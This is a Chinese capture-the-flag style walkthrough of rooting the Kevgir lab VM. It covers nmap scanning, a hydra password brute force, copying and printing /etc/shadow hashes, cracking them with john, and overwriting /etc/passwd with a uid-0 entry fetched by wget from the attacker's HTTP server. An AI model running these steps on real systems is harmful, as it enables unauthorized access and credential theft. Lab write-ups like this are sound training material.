一、信息搜集

首先利用ifconfig 指令得到kali 本機的ip 地址：192.168.179.129。

顯然這是一個C 類地址，使用nmap 搜索該網(wǎng)絡（192.168.179.0/24）下的所有主機。指令為：nmap -sn 192.168.179.0/24。

發(fā)現(xiàn)了Kevg 靶機的ip 地址為192.168.179.130。

使用nmap -sV 工具探測Kevg 主機的端口服務。

?

二、外網(wǎng)突破

原本想直接用hydra 嘗試爆破root 的密碼，但我使用的密碼本無法匹配正確的密碼，于是用hydra 嘗試通過ftp 端口25來爆破admin 用戶的密碼，發(fā)現(xiàn)正好爆破出密碼也為admin（這里使用ssh 的1322端口也可以）。

指令為hydra -l admin -P /home/kali/Desktop/passwords.txt 192.168.179.130 ftp -s 25 (password.txt 是我找到的一個比較符合大而精原則的密碼本)。

?

使用ssh 遠程連接Kevg 靶機，端口為1322，指令為ssh -p 1322 admin@192.168.179.130。輸入admin 密碼：admin。

成功遠程登錄靶機的admin 用戶。

三、權限提升

權限提升過程中，我一開始想直接修改admin 為root 用戶，即在kali 主機上修改passwd 中admin 的uid 和gid 為0，再上傳到靶機上覆蓋靶機的passwd 文件。但覆蓋后發(fā)現(xiàn)由于自己當前就是admin 用戶，uid 為1002，但此時文件中自己的uid 已經(jīng)被改成了0，系統(tǒng)無法識別我當前的用戶，無法再進行進一步操作。因此必須要再找到另一個用戶名，將其修改為root 權限并進行覆蓋。

首先，在登錄admin 用戶之后，查詢etc 文件夾下的shadow 文件，該文件存儲 Linux 系統(tǒng)中用戶的密碼信息。

?

?

但該文件只有root 權限才能訪問，因此我們可以將其復制出來再訪問復制文件，輸入cp /etc/shadow shadow1，將文件復制在目前的文件夾下，命名為shadow1：

?

訪問shadow1文件：

?

發(fā)現(xiàn)三串Hash 密碼：

admin:$6$mf3G6MUz$/si.Yp0SgJH/D4WQRC2lyRAaFKUqeHzC3ZbL7ENrCR2lCNibr0d8V0y03JFEnymP8MZzBi3m6mvaeeUmyySve/:16834:0:99999:7:::

user:$6$a9pCcsxn$5xvkibMZh9RDRVuAeC6vJSR2x17t52pYtdd50/rh3TY.ZoE53GE.OcbtVdBMRKROLko.qbIqj88k5mOXjtE3q.:16834:0:99999:7:::

root:$6$6ZcgUVCV$Ocsce9FUHYswcbI3UtrPNqFnkvcPOnEtstWlVSTqGYEYAYZ9aYw7tnW35uRGxb1z7ZZBZ.hoQcm/S/cg0f4uI0:16843:0:99999:7:::

其中admin 的密碼破解出來就是admin ，我們的目的是獲取除了admin 之外另一個用戶的密碼，并將該用戶修改為root 用戶。我首先直接嘗試hashcat 以及john 工具暴力破解root 的密碼，發(fā)現(xiàn)都破解不出來，所以我選擇破解user 的密碼。我將user 的密碼信息存儲在桌面上，命名為user，輸入指令為：john user，破解得到：

?

即user 用戶的密碼為resu。那么下一步就是將user 修改為root 權限。

先查看本機passwd，發(fā)現(xiàn)本機上沒有admin 用戶和user 用戶，因此，我們需要添加這兩個用戶（添加用戶需要kali 的root 權限）。添加用戶使用useradd 指令。

?

添加后，將passwd 復制到桌面上方便下一步調(diào)用。查看添加用戶后的passwd ，我們只需要將 admin 的 uid 和 gid 改成 Kevg 主機上對應的值，再將user 用戶的uid 和gid 都改成0，也就是root 用戶。

查看一下靶機admin 用戶id：

修改kali 本機的passwd：

?

在kali 主機上建立http 連接，端口為8000，通過該連接可以實現(xiàn)主機和靶機之間的文件傳輸。

在靶機上利用wget 指令獲取主機上的passwd 文件，指令為：wget http://192.168.179.129:8000/passwd。

?

將獲取到的passwd 文件覆蓋掉靶機中原passwd 文件，并用cat 指令查看，確認已經(jīng)成功覆蓋：

接下來就可以獲取root 權限了，輸入su user，密碼為 resu：

輸入whoami 確認自己身份：

完成提權，獲得Kevg 靶機root 權限。

總結

以上是生活随笔為你收集整理的Kevgir靶机渗透——弱口令爆破的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。